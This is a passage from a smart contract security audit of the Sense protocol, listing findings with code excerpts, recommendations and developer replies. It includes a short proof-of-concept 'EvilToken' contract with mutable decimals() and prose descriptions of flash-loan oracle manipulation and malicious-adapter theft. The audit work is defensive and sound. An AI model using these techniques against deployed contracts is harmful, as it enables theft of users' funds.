series[adapter][maturity].reward); ERC20(stake).safeTransferFrom(adapter, msg.sender, stakeSize); ... ,! } function backfillScale(...) external requiresTrust { ... uint256 reward = series[adapter][maturity].reward; ERC20(target).safeTransferFrom(adapter, cup, reward); ERC20(stake).safeTransferFrom(adapter, stakeDst, stakeSize); ... } Recommendation: After sending the reward and the stake, set a flag to prevent sending it a second time. Sense: Addressed in #155. Spearbit: The reward is set to 0 now so won’t be transferred twice. There may still, however, be a risk with stakeSize. +3.1.6 Untrusted ERC-20 decimals() Return Values Could Be Mutated, Un- cached Access Shouldn’t Be Considered Reliable Severity: High Risk Context: • Space.sol#L133, GClaimManager.sol#L59, CAdapter.sol#L96, • CAdapter.sol#L109, CAdapter.sol#L113-115, Divider.sol#L426-427, 9 • Periphery.sol#L70-71, Periphery.sol#L546-548, Divider.sol#L676. Situation: Numerous parts of the logic above perform repeated calls to the decimals() function of Target.sol and Underlying.sol. At times, these are used in various calculations. An attacker is able to mutate the variable returned by decimals() multiple times intra-transaction if they so wished, when it comes to a permissionless or un- trusted ERC-20, target or underlying. This could lead to exploits due to the return value for decimals() is used for calculating balance transfers and other important logic. Here is an proof of concept example of an EvilToken contract cast with Rari’s ERC-20 abstract, returning different decimals() results based on timestamp: import { ERC20 } from "contracts/ERC20.sol"; //Rari ERC20 contract EvilToken { function decimals() view public returns (uint8) { return uint8(block.timestamp % 18); } } contract Victim { function getTokensDecimals(address token) view public returns (uint8) { return ERC20(token).decimals(); } } Recommendation: Any external calls should pass some logical pre-conditions. The result of those external calls should be stored in internal contracts and be re-used when the result is expected to be constant, as is the case with decimals(). In this case, the external call to decimals() or other external "constants" should be consolidated in one call backed by preconditions. When these preconditions are met, the call should accept it, cache the value in its respective adapter, and have future dependent reads of this constant from that location, rather than from an external call to decimals(). After they pass logical preconditions, the adapter should save any constants pertaining to Target and Underlying tokens, rather than doing an external call each time. The danger with external calls is that they could return a different result, bypass initial logical preconditions, and mutate the result to achieve an 10 exploit. Sense: We’ve decided to cache some values from adapters here & here, but for others (like target decimals), we’ve decided to leave them out under the assumption that a malicious actor can cause problems in many ways, and we can’t make strong guarantees about them without reviewing the code. The onus will be on us to clearly communicate which adapters have been audited and are seen as safe Spearbit: It is indeed important to show which adapters are audited. +3.1.7 LP Oracle Should Enforce 18 Decimals Or Use Decimal Flexible Fixed Point Math Severity: High Risk Context: LP.sol#L87-L88 uint256 value = PriceOracle(msg.sender).price(tokenA).fmul(balanceA, ,! FixedPointMathLib.WAD) + PriceOracle(msg.sender).price(tokenB).fmul(balanceB, FixedPointMathLib.WAD); ,! Situation: This calculation assumes all priced tokens have 18 decimals. This can be implicitly enforced with Zero tokens which can be deployed at 18 dec- imals every time. However, target tokens exist that are not 18 decimals, such as USDC (6 decimals) or any user-created ERC-20 could set decimals to uint8 bounds. If a target token lower than 18 decimals is passed, this would yield the calcula- tion to return an undervaluing of the LP tokens. If the target token was greater than 18 decimals, it could yield an overvalue. Both of these could lead to attacks. According to the documentation, the cre- ation of Zeroes and Fuse pools is intended to become permissionless. This means that users could build malicious pools that purposely undervalue or over- value to steal the tokens of other users that join it. Recommendation: Enforce and support only tokens with 18 decimals, which is likely the safest option, considering the complexity. This contract should check the decimals variable of both tokens passed. Alternatively, consider making the calculation more flexible, by utilizing the to- ken’s decimals as the base units for the fixed point math, rather than the con- stant WAD. 11 uint256 value = PriceOracle(msg.sender).price(tokenA).fmul(balanceA, ,! 10**tokens[0].decimals()) + PriceOracle(msg.sender).price(tokenB).fmul(balanceB, 10**tokens[1].decimals()); ,! With permissionless tokens, there is still a risk of abuse and exploitation with this flexibility; a malicious party could create an ERC-20 contract that reports a certain decimals() value under normal circumstances and a different one when they wish to conduct the attack. By checking tx.origin, msg.sender, or another global variable they may have control over, they may trigger an attack. With the current set of contracts, there isn’t a safe, flexible method, but another issues ("untrusted ERC-20 decimals") is available for a fix for this. This issue suggests that the decimals() pass some preconditions and then be stored in the adapter. Pulling decimals() from the adapter instead should be safer. uint256 value = PriceOracle(msg.sender).price(tokenA).fmul(balanceA, ,! adapter.cachedDecimals(tokenA) + PriceOracle(msg.sender).price(tokenB).fmul(balanceB, adapter.cachedDecimals(tokenB)); ,! This assumes an implementation where the adapter pulls then checks and caches the decimals() for tokens pertaining to it. Sense: Addressed in #165. Spearbit: I would consider it provisionally fixed, because that specific fix poten- tially expands the "untrusted ERC-20 decimals" vulnerability, at least in the case of untrusted ERC-20, potentially added when permissionless. Sense: Noted! However, there are no plans at this time to allow permissionless adapters to use the fuse pool (the consumer of the oracle). Spearbit: Sounds good in this regard then, the tokens should not be untrusted and are expected to be audited + verified on Etherscan or reproducible bytecode confirmed. +3.1.8 Intra-Transaction Oracle Tampering Possible With LP Pricing Using Flashloans Severity: High Risk Context: LP.sol#L87-L88 12 uint256 value = PriceOracle(msg.sender).price(tokenA).fmul(balanceA, ,! FixedPointMathLib.WAD) + PriceOracle(msg.sender).price(tokenB).fmul(balanceB, FixedPointMathLib.WAD); ,! Situation: This utilizes the current balances of the respective tokens within the LP. As these are current balances, they are trivial to manipulate via a flash loan. By setting arbitrary pool values only true for a certain point of the transaction, an attacker could potentially tamper with the price. An attacker could also exploit this to create a skewed price of one of the tokens in the fuse pool and then drain the contract of the rest. Recent similar attacks have been done in the wild on Fuse. This resulted from weak Oracles, even in the case of ones with TWAP. The associated Zero price should have a TWAP backing it according to the cur- rent commit hash, when it is completed and working. However, if the oracle is enabled on a pool without sufficiently safe liquidity, it may too be vulnerable to flash loan attacks, even with the TWAP. The target price, which will be the other token used in the calculation, may also be manipulable. This token also does not appear to be a TWAP based on the 2 current adapter implementations. Therefore, it is even more trivial to manipulate, even with sufficient liquidity. This is true except in the case that a constant pricing is used, i.e. for CETH. Compound-based adapters will likely use their built-in Oracle pricing. Prior im- plementations have been exploited in the past, even with stablecoins such as DAI leading to millions in losses. Recommendation: Avoid using variables that are current and that the trans- action originator (tx.origin) could temporarily change during the course of the transaction. This is most commonly done now by using time-weighted calcula- tions of the variables at hand. Utilizing these makes it much harder to pull off a profitable intra-transaction attack and will likely require to be spread over multiple blocks. The more blocks, the likelier any skewing by the prospective attacker is arbitraged/MEV’d out. This increases the risk of loss to a potential attacker and discouraging such an attack. As a result, intra-transaction attacks are practically risk-free. One part of the Balancer pools is the ability to enable it as an oracle. These should only be enabled once they attain a minimal liquidity threshold that is 13 sustained over a period of time. Even if using TWAP, a low-liquidity pool could still yield profitable attacks within a relatively short number of blocks of the tam- pering transaction. It is also important to consider multiple sources of truth; if available (and ideally on-chain), require them to be within some acceptable margin of error to each other. If they are outside of this margin, they should fail. The sources should always come from a source above a liquidity threshold, as one low liquidity source could be used to grief others. Sense: We are exploring viable solutions to this with the Balancer team. Our work is in the direction of this suggestion: Additionally consider multiple sources of truth if available, ideally on- chain, and require them to be within some acceptable margin of error to each other, but fail if they are outside of this margin. Namely, there are certain properties of Zeros that will let us bound a reason- able price (a Zero cannot go above 1 underlying, and the price will not be too dislocated from other Zeros of similar Series). +3.1.9 Avoid External Calls To Transient Or Unverified External Contracts Severity: High Risk Context: PoolManager.sol#L190 uint256 err = ComptrollerLike(comptroller)._deployMarket(false, ,! constructorData, targetParams.collateralFactor); PoolManager.sol#L254 uint256 errZero = ComptrollerLike(comptroller)._deployMarket( PoolManager.sol#L274 uint256 errLpToken = ComptrollerLike(comptroller)._deployMarket( Situation: External calls take place via the _deployMarket function through the set Comptroller. Rari Capital’s on-chain Ethereum mainnet Comptroller calls out to a contract called FuseAdminProxy. This contract’s implementation can be transient and it’s underlying implementation source code is missing as well as unverified on Etherscan. It handles the deployment and potential control of fuse pool derived tokens. 14 Interacting with transient, unverified contracts on-chain can be quite dangerous, as its underlying logic could turn malicious at some point. Due to the difficulty in verifying states or effects, interacting with unverified/missing contracts could lead to some malicious contract interactions. Below are the listed on-chain contracts as reference points with links to their respective Etherscan page. • FuseAdmin proxy contracts (AdminUpgradabilityProxy.sol) on Etherscan • Unverified Implementation used by proxy on Etherscan • Unitroller is directly called here, which is an upgradeable proxy contract on Etherscan Currently, the above point to the following Comptroller implementation on Ether- scan. Recommendation: Make sure any dependencies of the code logic lead to verified contracts only. With regards to transient or proxy and/or upgradeable contracts, keep in mind that there is a high degree of trust put into whatever personnel are managing said proxy. Be absolutely sure to trust the proxy personnel to not eventually deploy a breaking and/or malicious contract. If Sense Team must, then ideally, the team will consider only interacting with proxy patterns that may allow the dependent users to opt-in to logic or implementation changes. Sense: Noted that the Rari Capital team has been informed of the unverified contract and will see to it to be verified. +3.1.10 Check zeroParams and lpTokenParams Is Not Empty Severity: High Risk Context: PoolManager.sol#L158-197 Situation: The function addTarget() checks targetParams is not empty. How- ever, addSeries() does not check for that and zeroParams and lpTokenParams are not empty. As these parameters are set via setParams(), they might not be set yet. Com- bined this with the fact that anyone can call addSeries() and there is a possi- bility of a griefing attack. 15 function addTarget(address target, address adapter) external requiresTrust ,! returns (address cTarget) { ... require(targetParams.irModel != address(0), Errors.TargetParamNotSet); ... bytes memory constructorData = abi.encode( ... targetParams.irModel, ... ); uint256 err = ComptrollerLike(comptroller)._deployMarket(false, constructorData, targetParams.collateralFactor); ... ,! } function addSeries(address adapter, uint48 maturity) external { ... // no checks on zeroParams bytes memory constructorDataZero = abi.encodePacked( ... zeroParams.irModel, ... ); uint256 errZero = ComptrollerLike(comptroller)._deployMarket(false, constructorDataZero, zeroParams.collateralFactor); ... // no checks on lpTokenParams bytes memory constructorDataLpToken = abi.encodePacked( ... lpTokenParams.irModel, ... ); uint256 errLpToken = ComptrollerLike(comptroller)._deployMarket(false,constructorDataLpToken, lpTokenParams.collateralFactor); ... ,! ,! ,! } Recommendation: Verify that zeroParams and lpTokenParams are not empty within the function addSeries(). Sense: Addressed in #156. Spearbit: Acknowledged. +3.1.11 Use safeMath for Space contract Severity: High Risk 16 Context: • Space.sol#L132, Space.sol#L133, Space.sol#L182, Space.sol#L213, • Space.sol#L214, Space.sol#L263, Space.sol#L264, Space.sol#L291, • Space.sol#L300, Space.sol#L356, Space.sol#L366, Space.sol#L369, • Space.sol#L373, Space.sol#L379, Space.sol#L401, Space.sol#L418, • Space.sol#L423, Space.sol#L435, Space.sol#L439, Space.sol#L443, • Space.sol#L447, Space.sol#L456, Space.sol#L493, Space.sol#L498, • Space.sol#L503, Space.sol#L509, Space.sol#L510, Space.sol#L516, • Space.sol#L523, Space.sol#L524. Situation: onJoinPool() is high risk, as it could mint a large amount of tokens and other locations in Space.sol. The safe contract builds on Balancer contracts and thus uses solidity 0.7.x. However, the math operations in solidity 0.7.x can underflow and overflow. The safe contract doesn’t have sufficient protection against this. Recommendation: Use safeMath functions for all addition, subtraction, multi- plication and divisions, from for example Open Zeppelin SafeMath.sol or Bal- ancer Math.sol libraries for solidity 0.7.x. Sense: Addressed in #3. Note in this PR that everywhere safeMath is not used, an explicit reason is given. Spearbit: Acknowledged. 3.2 Medium Risk Issues +3.2.1 Attempted Out Of Bound Array Access On TWAP Result When Zero Address >= Target Address Severity: Medium Risk Context: Zero.sol#L87-98 17 BalancerOracleLike.OracleAverageQuery[] memory queries = new BalancerOracleLike.OracleAverageQuery[](1); ,! queries[0] = BalancerOracleLike.OracleAverageQuery({ variable: BalancerOracleLike.Variable.PAIR_PRICE, secs: TWAP_PERIOD, ago: 0 }); uint256[] memory results = pool.getTimeWeightedAverage(queries); // get the price of Zeros in terms of underlying (uint8 zeroi, ) = pool.getIndices(); uint256 zeroPrice = results[zeroi]; Situation: zeroi can be either 0 or 1, dependant upon the zero address being smaller or equal/larger than its corresponding target address. In the latter case, out of bounds array access is attempted on the results variable, which only returns 1 result. This matches the requested number of queries, which is 1. This out of bounds access leads to a panic code-path and will revert the transaction. This means any Zero address that has a larger bytes20 representation than its target would be DoS’d from accessing the Zero oracle. Thereby, a number of functionalities for it would never be able to work. In the case of non-deterministic address being used, the chance of this occurring is equivalent to a coin toss, i.e. 50/50. If it had been deployed in the wild, this may not initially be noticed. Due to the probabilistic nature of this problem, it may go unnoticed, even with some initial successful deployment of Zero contracts. However, when it has been discovered, it would require a pause and redeploy with fix. References Balancer v2 test snippet confirming behaviour of getTimeWeighte- dAverage returning 1 result per query: PoolPriceOracle.test.ts#L521-L540. Recommendation: With array access or modification, always ensure it is kept within bounds (and that its bounds are known). The addition of unit tests and fuzzed tests, attempting different scenarios, could help avoid this. In this case, the contract should only access the result at index0, and mathe- matically handle the pricing as needed, if it’s reciprocal is required. +3.2.2 Force Claim Collection For Any Address Severity: Medium Risk 18 Context: Divider.sol#L331-398, Claim.sol#L37-44 Situation: In this scenario, assume an actor does a transferFrom transaction on the Claim token contract with a specific from and an amount of 0 tokens. This transaction will succeed in the ERC20 contract as allowance == 0 and amount <= allowance, then collect() in Divider.sol will be called with uBalTransfer == 0. The _collect() function will be called where uBal and uBalTransfer are set to uBal (which is the balance of the from). This scenario triggers the claim collection from the from. The from might not want to do the claim collection at that point in time. The claim itself will go to the from, so nothing is lost there, but the control over timing could be an issue. contract Claim is Token { ... function transferFrom(...) public override returns (bool) { Divider(divider).collect(from, adapter, maturity, value, to); // No revert on return super.transferFrom(from, to, value); super.transferFrom(from, to, 0); } ,! } contract Divider is Trust, ReentrancyGuard, Pausable { ... function collect(address usr,address adapter, uint256 maturity, uint256 uBalTransfer, // uBalTransfer == 0 address to) external nonReentrant onlyClaim(adapter, maturity) whenNotPaused returns (uint256 collected) { uint256 uBal = Claim(msg.sender).balanceOf(usr); return _collect(usr, adapter, maturity, uBal, uBalTransfer > 0 ? uBalTransfer : uBal, to); //_collect is called with uBal as second last parameter } ,! ,! ,! ,! } This construction is probably created to support the calling of collect() in con- tract Claim.sol: function collect() external returns (uint256 _collected) { return Divider(divider).collect(msg.sender, adapter, maturity, 0, address(0)); ,! } Recommendation: Differentiate between these two calls from the Claim.sol contract: transferFrom() and collect() and do not trigger a collect() from an empty transferFrom(). 19 Sense: Fixed in #168. Spearbit: Acknowledged. +3.2.3 Disabled Adapters Should Stay Disabled Severity: Medium Risk Context: Divider.sol#L107-109 function addAdapter(address adapter) external whenPermissionless whenNotPaused ,! { _setAdapter(adapter, true); } Situation: Anyone can enable an adapter again as soon as someone has dis- abled the adapter (in whenPermissionless). This circumvents the reason to disable the adapter. Recommendation: Don’t allow an adapter that has been removed (i.e. it was active and it is being disabled) to be re-added. As discussed, this is the preferred solution of the Sense team. Sense: Fixed here. Spearbit: Acknowledged. +3.2.4 Composability of GClaimManager Severity: Medium Risk Context: GClaimManager.sol, Claim.sol, Divider.sol Situation: When calling the function join() and exit() from contract GClaim- Manager, the function _collect() of Divider is called via transfer() or trans- ferFrom() and collect(). The function _collect() can revert in certain circumstances, which means join() and exit() will also revert. As these functions are meant for composability, this can pose a problem be- cause transactions will not be able to continue. 20 contract GClaimManager { function join(address adapter, uint48 maturity, uint256 uBal) external { ... ERC20(claim).safeTransferFrom(msg.sender, address(this), uBal); ... } function exit(address adapter, uint48 maturity, uint256 uBal) external { ... ERC20(claim).safeTransfer(msg.sender, uBal); ... } } contract Claim is Token { function transfer(address to, uint256 value) public override returns (bool) { ,! Divider(divider).collect(msg.sender, adapter, maturity, value, to); ... } function transferFrom(address from, address to, uint256 value) public override returns (bool) { ,! Divider(divider).collect(from, adapter, maturity, value, to); ... } } contract Divider is Trust, ReentrancyGuard, Pausable { ,! ,! function collect(...) external nonReentrant onlyClaim(adapter, maturity) whenNotPaused returns (uint256 collected) { ... return _collect(usr, adapter, maturity, uBal, uBalTransfer > 0 ? uBalTransfer : uBal, to); } function _collect(...) internal returns (uint256 collected) { ... if (_settled(adapter, maturity)) { ... } else { // If we're not settled and we're past maturity + the sponsor ,! window, // anyone can settle this Series so revert until someone does if (block.timestamp > maturity + SPONSOR_WINDOW) { // in some situation revert occurs revert(Errors.CollectNotSettled); } } ,! } 21 Recommendation: Determine the goals for composability and possibly recon- sider the revert. Note: GClaimManager will most likely be deprecated. This issue is included for completeness. +3.2.5 Reentrancy Safeguards Needed In GClaimManager Severity: Medium Risk Context: GClaimManager.sol#L77-104 Situation: In function exit() of GClaimManager.sol, the burning on the tokens is done at the end. This is not according to the Checks-Effects-Interactions pattern and no non- Reentrant modifier is used. Reentrancy is possible with a malicious adapter contract and is potential in other situations as well. function exit(address adapter, uint48 maturity, uint256 uBal) external { ... // External call uint256 collected = Claim(claim).collect(); ... // External call uint256 tBal = uBal.fdiv(gclaims[claim].totalSupply(), total); ... // External call ERC20(Adapter(adapter).target()).safeTransfer(msg.sender, tBal); ... // External call ERC20(claim).safeTransfer(msg.sender, uBal); // Burn the user's gclaims // Completed at the very end with potential reentrancy above gclaims[claim].burn(msg.sender, uBal); ... } Recommendation: To improve security, add a nonReentrant modifier on func- tions of GClaimManager that do external calls. Note: GClaimManager will most likely be deprecated. This issue is included for completeness. 22 +3.2.6 Do collect() First In GClaimManager Severity: Medium Risk Context: GClaimManager.sol#L36-75 Situation: The function join() of GClaimManager.sol pulls target to backfill for previous collect()s. However, if collect() hasn’t been called for a long time (or not called at all), the user might not have enough target for the backfill. function join(address adapter,uint48 maturity,uint256 uBal) external { ... /* Pull the amount of `Target` needed to backfill the `excess` back to issuance, retrieves previously `collect()`'ed `target` */ ERC20(Adapter(adapter).target()).safeTransferFrom(msg.sender, address(this), tBal); ... // Pull Collect Claims to GClaimManager.sol ERC20(claim).safeTransferFrom(msg.sender, address(this), uBal); /* This will call `Divider.collect()` and send target to the `msg.sender` */ ... ,! } Recommendation: If the Sense Team agrees this is an issue, then call Di- vider.collect() at the beginning of function join(). Note: GClaimManager will most likely be deprecated. This issue is included for completeness. +3.2.7 Do Not Use abi.encodedPacked With Multiple Dynamically-Sized Types Severity: Medium Risk Context: Fuse.sol#L242-L252, Fuse.sol#L262-L272 Situation: The abi.encodePacked method is called where there are multiple dynamically-sized types. Trying to pack these dynamically-sized types leads to ambiguity in unpacking. This makes it difficult to impossible to unpack, espe- cially in a safe manner. It is made more difficult, in a case like this, because users have some limited input control over the contents passed via the name and symbol parameters. This could present a danger, when the contract be- comes permissionless for adding custom zero/claim adapters. 23 bytes memory constructorDataZero = abi.encodePacked( zero, comptroller, zeroParams.irModel, ERC20(zero).name(), ERC20(zero).symbol(), cERC20Impl, "0x00", zeroParams.reserveFactor, adminFee ); Recommendation: abi.encode should be used here instead and abi.decode to appropriately decode the externally called contract. Sense: Addressed in #156. +3.2.8 Imported Trust Contract Has Poor Access Controls Severity: Medium Risk Context: solmate/Trust.sol Situation: This contract gives blanket authority to any and every single account It that is trusted. This means full access to any privileged contract functions. also allows any trusted account to unilaterally set or remove trusted users. Therefore, if any single trusted account were to ever be compromised, the mali- cious accounts could lock out all other trusted accounts, including the compro- mised account, leaving control only in the hands of the malicious actors. Based on the work-in-progress deployment scripts inspected within the project, the Divider contract would be deployed by an EOA (externally owned account, i.e. regular Ethereum address behind a private key) named deployer, and sub- sequently another EOA named Dev would be added as an additional trusted user. If either were to be compromised, which is very well likely to occur with an EOA, it would lead to a compromise of the Divider contract with its privileged functions. The more EOAs are added as trusted users, the greater the risk with this Trust contract. Additionally, TokenHandler and PoolManager are insofar deployed by an EOA, which becomes their trusted account. Periphery will also depend on a trusted 24 account. These contracts expose a number of privileged actions to trusted users. In some cases, the Trust contract is utilized to set the contract that deployed it as its trusted user. In many cases, this will be safer with the assumption that the contract does not have some ability or vulnerability of adding other trusted users. Recommendation: Consider a more robust RBAC (Role Based Access Con- trol) Trust and Authority contract to import for such functionality that allows for finer-grained control as to which users have which permissions, rather than a blanket 'root' access among all users. With such a contract, a secure multisig would be best to be utilized as root, with all permissions and able to add or remove permissions to other addresses. EOAs would be safer to utilize with this pattern, but one would ideally just utilize them still for lower privileged common calls, while leaving higher privileged calls in the hands of multisigs. This Trust contract can be acceptable for contract-to-contract trust. However, this is true only if either the ability to add or remove new trusted users is re- moved or it is assured that the trusted contract has no methodologies of adding new trusted users in such a design. If the team wishes to continue using this Trust library, it should only operate on it utilizing a multisig. Initial deployment is acceptable by an EOA, however, before it gets deployed live, all access controls should be solely with secure multisigs from that point forward. Sense: We’ve decided to stick with Trust and use a multisig. +3.2.9 Move The safeApprove() Stake to BaseAdapter.sol and Update the Inheritance in Periphery.sol Severity: Medium Risk Context: BaseAdapter.sol, CropAdapter.sol, WstETHAdapter.sol, CAdapter.sol, Periphery.sol Situation: The inheritance of the BaseAdapter.sol isn’t quite right, which re- sults in a few issues: 25 Periphery.sol imports Adapter from CropAdapter.sol, while WstETHAdapter.sol inherits directly from BaseAdapter.sol. The safeApprove() of stake in the constructor for CropAdapter isn’t called for WstETHAdapter.sol. This means that the Divider cannot transfer the stake, which it tries to do in settleSeries() and backfillScale(). Recommendation: Move the safeApprove() of stake to BaseAdapter.sol (as- suming the stake is relevant for all adapters). In Periphery.sol, change the inheritance from CropAdapter.sol to BaseAdapter.sol. Sense: We’ve changed here the Periphery to import BaseAdapter and not CropAdapter. Also, we have removed the safeApprove() there which fixes the mentioned issue. Do you still think that it’s better to merge CropAdapter into BaseAdapter? The idea was to keep them separate as not all the adapters need the crop function- ality (this is the case of the CAdapter for example). Spearbit: If it’s useful to keep CropAdapter separate that is also fine. However, the linked change does not seem to remove the safeApprove() call from the CropAdapter constructor as stated. +3.2.10 Checks In issue() And redeemZero() Severity: Medium Risk Context: Divider.sol#L183-231, Divider.sol#L279-313 Situation: The functions issue() in Divider.sol#L183-231 and redeemZero() of Divider.sol have extra checks when the flags level.issueRestricted() or level.redeemZeroRestricted() are set. In that case, the function can only be executed when called from an adapter. The contract Periphery, specifically Periphery.sol#L410, Periphery.sol#L514, Periphery.sol#L557, calls these functions as well. However, these calls would not be allowed. The extra checks are potentially too strict. 26 function issue(...) external nonReentrant whenNotPaused returns (uint256 uBal) ,! { ... if (level.issueRestricted()) { require(msg.sender == adapter, Errors.IssuanceRestricted); } ... } function redeemZero(...) external nonReentrant whenNotPaused returns (uint256 ,! tBal) { ... if (level.redeemZeroRestricted()) { require(msg.sender == adapter, Errors.RedeemZeroRestricted); } } Recommendation: Double check if calling from Periphery should also be al- lowed. Sense: After seeing this issue, we’ve decided that if redeemZeroRestricted() in Divider.sol#L289-291 is set, then when _removeLiquidity() in Periphery.sol- #L551-578 is called at or after maturity we will not be redeeming zeros and will transfer the zeros back to the user. You can see this change on PR#160. Spearbit: Acknowledged. +3.2.11 Defining Bytes Literals With A String Literal Causes Malformed Bytes Severity: Medium Risk Context: PoolManager.sol#L185, PoolManager.sol#L249, PoolManager.sol#L269, Periphery.sol#L375, Periphery.sol#L465, Periphery.sol#L472 Situation: The bytes variable is set by a string literal. The variable’s data in this case will be equivalent to the ASCII encoded data of the string, not a hex literal version of it. This causes the variable to contain malformed bytes which the developer likely In the best case, it causes unnecessary extra gas cost. Worst didn’t expect. case scenario, it could lead to undefined and unexpected effects during con- tract interaction, especially in the case of said bytes being passed onto other contracts as calldata. 27 e.g.PoolManager.sol#L185 bytes memory constructorData = abi.encode( target, comptroller, targetParams.irModel, ERC20(target).name(), ERC20(target).symbol(), cERC20Impl, "0x00", // calldata sent to becomeImplementation (currently unused) L185 targetParams.reserveFactor, adminFee ); The developer would appear to expect bytes as 0x00 to be sent along as call- data, but in fact this would send 0x30783030 as the calldata, the ASCII en- coded bytes equivalent of 0x00. The prospective contract this would call out to, for now, appears to essentially ignore these bytes. However, future implemen- tations could end up depending on it which would lead to adverse effects and issues. One of the on-chain contracts within this call-chain that may use this calldata is an unverified contract on chain, which could lead to issues, but cannot be confirmed due to lack of source code availability. If this ought to be 0x00, define it using a hex literal as hex'00'. Periphery.sol#L465 userData: "" It is an exception from the other mentioned context lines, since it’s just an empty string literal and won’t cause malformed bytes. However, it would still be best practice to define with a hex literal. The malformed bytes issue is why hex literals should be preferred over even hex escaped strings for bytes. Recommendation: Use hex literals whenever declaring or setting a bytes type, via hex'01234dead5678beef' for most clarity that it is bytes. If Sense prefers to utilize strings, appropriate hex escapes in the form of "\x01\x23" also work. Sense: Addressed in #156. 28 +3.2.12 Beware Of Malicious Adapters Severity: Medium Risk Context: Periphery.sol Situation: The following functions allow for interaction with any adapter. These adapters could be malicious. No additional checks are made on the validity of the adapter. Through the adapter, a re-entrant call could be made and no nonReentrant modifier is used in the Periphery contract. function sponsorSeries(address adapter, ... ) function swapTargetForZeros(address adapter, ... ) function swapUnderlyingForZeros(address adapter, ... ) function swapTargetForClaims(address adapter, ... ) function swapUnderlyingForClaims(address adapter, ... ) function swapZerosForTarget(address adapter, ... ) function swapZerosForUnderlying(address adapter, ... ) function swapClaimsForTarget(address adapter, ... ) function swapClaimsForUnderlying(address adapter, ... ) function addLiquidityFromTarget(address adapter, ... ) function addLiquidityFromUnderlying(address adapter, ... ) function removeLiquidityToTarget(address adapter, ... ) function removeLiquidityToUnderlying(address adapter, ... ) function migrateLiquidity(address srcAdapter, address dstAdapter,...) Within Periphery.sol, there are several locations where a safeApprove() is given to an adapter. Frequently, the token for which the safeApprove() is given is also derived from the adapter that can also be manipulated. These are the relevant lines: adapter to pull uBal adapter to pull underlying ERC20(target).safeApprove(address(adapterClone), type(uint256).max); ERC20(Adapter(adapter).underlying()).safeApprove(adapter, uBal); // approve ,! ERC20(Adapter(adapter).underlying()).safeApprove(adapter, uBal); // approve ,! ERC20(Adapter(adapter).target()).safeApprove(adapter, tBal); // approve adapter ,! underlying.safeApprove(adapter, uBal); ERC20(Adapter(adapter).target()).safeApprove(adapter, tBal); if (_allowance < amount) target.safeApprove(address(adapter), ,! to pull target type(uint256).max); A malicious adapter could therefore steal any tokens present in Periphery con- tract. This is true for both now and in the future, as the approval will persist. 29 Recommendation: Consider using a whitelist for the adapters. Add a non- Reentrant modifier to the function that use the adapter. Make sure no tokens will be stored in the Periphery contract (now and in the future). Sense: No tokens should be present in the Periphery contract so this reduces the potential impact. Sense: Regarding: Make sure no tokens will be stored in the Periphery contract (now and in the future). Yes, this is a great call and we’re currently going through to verify this. On the note of malicious adapters, our thinking is that we will need to be very clear which adapters have been verified/audited, because unknown ones we can make no guarantees about. Spearbit: Agreed. +3.2.13 Admin Can Always Update lscales Levels Severity: Medium Risk Context: Divider.sol#511-547, Divider.sol#L466-468 Situation: An administrator of the protocol can arbitrarily set the lscales levels of users at any moment. This directly impacts the amount that can be collected in the collect() function. The update of lscales levels can be done by setting the adapter to off, which will allow the require in backfillScale() to continue. Following this, a call to backfillScale() should be done to set arbitrary values to the lscales. Finally, set the adapter back to on. Although this is protected by requiresTrust, it is probably best to limit this possibility. 30 function setAdapter(address adapter, bool isOn) public requiresTrust { _setAdapter(adapter, isOn); } function backfillScale(..., address[] calldata _usrs, uint256[] calldata ,! _lscales) external requiresTrust { ... // continues when adapters[adapter] == false require(!adapters[adapter] || block.timestamp > cutoff, ...); /* Set user's last scale values the Series (needed for the `collect` method) */ for (uint256 i = 0; i < _usrs.length; i++) { lscales[adapter][maturity][_usrs[i]] = _lscales[i]; } ... } Recommendation: Double check the circumstances under which an adminis- trator can perform such updates. Sense: We’ve decided to keep this ability for admins for edge cases. Instead of removing it, it’ll be clearly mentioned in the docs and we’ll run dis processes to ensure that the community has sight into our thought processes. That said, we are internally still discussing this. 3.3 Low Risk Issues +3.3.1 Trust.sol No Longer Present In solmate Library Severity: Low Risk Context: • Divider.sol#L7, CropAdapter.sol#L5, EmergencyStop.sol#L5, LP.sol#L6, • Periphery.sol#L6, PoolManager.sol#L6, SpaceFactory.sol#L8, • Token.sol#L6, Underlying.sol#L5, Zero.sol#L6, Target.sol#L5. Situation: The contract Trust.sol is no longer present in the latest version of the Rari-Capital solmate library. This means no (security) updates/fixes will be made on the Trust.sol contract. Recommendation: Fork the latest version of Trust.sol or move to another 31 authorization library. Sense: We’ve decided to bump solmate to v6 and maintain Trust.sol our- selves inside our utils package. Fixed here. +3.3.2 Change References to SafeERC20.sol to SafeTransferLib.sol Severity: Low Risk Context: • Divider.sol#L6, GClaimManager.sol#L5, Periphery.sol#L5, • BaseAdapter.sol#L5, CAdapter.sol#L6 CropAdapter.sol#L6, • LP.sol#L5, Pool.sol#L4, Vault.sol#L4, Zero.sol#L5, • BaseFactory.sol#L6, WstETHAdapter.sol#L9. Situation: The functions from SafeERC20.sol are moved to SafeTransfer- Lib.sol, which means the code need changes to be able to compile with the latest version of the solmate library. Recommendation: Change the references from SafeERC20 to SafeTransfer- Lib. Sense: Fixed here. +3.3.3 Entry Checks exit() and excess() Severity: Low Risk Context: GClaimManager.sol Situation: The function exit() and excess() in GClaimManager don’t check join() has been completed. The function excess() doesn’t check claim exists. Although the functions will either revert or do non-harmful updates, it is better to check and give a relevant error message. Also for consideration: excess() stores data. the comment "VIEWS" is misleading, as the function 32 function exit(address adapter, uint48 maturity,uint256 uBal) external { (, address claim, , , , , , , ) = Divider(divider).series(adapter, maturity); require(claim != address(0), Errors.SeriesDoesntExists); ... uint256 total = totals[claim] + collected; ... gclaims[claim].burn(msg.sender, uBal); // will revert if join() hasn't been done // Doesn't check join() has been done ,! ,! } function excess(address adapter,uint48 maturity,uint256 uBal) public returns ,! (uint256 tBal) { (, address claim, , , , , , , ) = Divider(divider).series(adapter, maturity); // Doesn't check claim != address(0) uint256 initScale = inits[claim]; // Doesn't check initScale !=0, e.g. join() has been done ,! ,! } Recommendation: Do appropriate entry checks in the functions exit() and excess(). Remove the "VIEWS"comment. Note: GClaimManager will most likely be deprecated. This issue is included for completeness. +3.3.4 Require SeriesStatus to be NONE Before Calling queueSeries Severity: Low Risk Context: PoolManager.sol#L210 require(sStatus[adapter][maturity] != SeriesStatus.QUEUED, ,! Errors.DuplicateSeries); Situation: Currently, this line checks that the SeriesStatus is not QUEUED. This means, after it is added, a trusted user could once more re-queue the series, allowing others to potentially re-call addSeries. This is so potentially because, from the submitted contract, it is possible, and, from the verified contracts, this would actually call out to it also seems possible. 